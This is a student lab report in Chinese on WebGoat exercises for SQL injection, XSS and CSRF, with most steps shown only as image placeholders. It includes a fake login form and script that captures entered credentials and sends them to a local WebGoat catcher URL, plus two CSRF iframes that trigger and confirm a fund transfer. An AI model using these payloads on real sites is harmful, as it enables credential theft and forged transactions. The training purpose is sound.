其他分享
首页 > 其他分享> > 2019-2020-2 20175227张雪莹《网络对抗技术》Exp9 Web安全基础

2019-2020-2 20175227张雪莹《网络对抗技术》Exp9 Web安全基础

作者:互联网

目录

实验内容

WebGoat安装

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

返回目录

SQL注入攻击

SQL注入攻击:相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。

① 命令注入(Command Injection)

在这里插入图片描述

在这里插入图片描述

② 数字型SQL注入(Numeric SQL Injection)

在这里插入图片描述

在这里插入图片描述

③ 日志欺骗(Log Spoofing)

在这里插入图片描述

④ 字符串型注入(String SQL Injection)

在这里插入图片描述

在这里插入图片描述
⑤ LAB: SQL Injection

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
⑥ 数据库后门(Database Backdoors)

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

⑦ 数字型盲注入(Blind Numeric SQL Injection)

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

⑧ 字符串型盲注入(Blind String SQL Injection)

在这里插入图片描述

返回目录

XSS攻击

XSS攻击:通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

① 跨站脚本钓鱼攻击(Phishing with XSS)

  1. 编写一个含有文本框、提交按钮的表单的代码
	<form>
<br><br><HR><H3>This feature requires account login:</H3 ><br><br> 
Enter Username:<br><input type="text" id="user" name="user"><br> 
Enter Password:<br><input type="password" name = "pass"><br> 
</form><br><br><HR>

在这里插入图片描述

  1. 编写一段脚本读取被攻击者在表单上输入的用户名和密码信息,将这些信息发送给捕获这些信息的 WebGoat
<script>
function hack()
{ 
    alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); 
    XSSImage=new Image; 
    XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";
}
</script>

在这里插入图片描述

② 存储型XSS攻击(Stored XSS Attacks)

在这里插入图片描述
③ 反射型XSS攻击(Reflected XSS Attacks)

在这里插入图片描述

返回目录

CSRF攻击

① Cross Site Request Forgery

在这里插入图片描述

在这里插入图片描述

② CSRF Prompt By-Pass

<iframe src="attack?Screen=1471017872&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=1471017872&menu=900&transferFunds=CONFIRM"> </iframe>

返回目录

老师提问

SQL注入攻击原理,如何防御

XSS攻击的原理,如何防御

CSRF攻击原理,如何防御

返回目录

所遇到的问题及其解决方法

返回目录

实验感想

返回目录

参考资料

返回目录

标签:Web,Exp9,张雪莹,XSS,攻击,SQL,攻击者,Injection,注入
来源: https://www.cnblogs.com/zxy20175227/p/12926584.html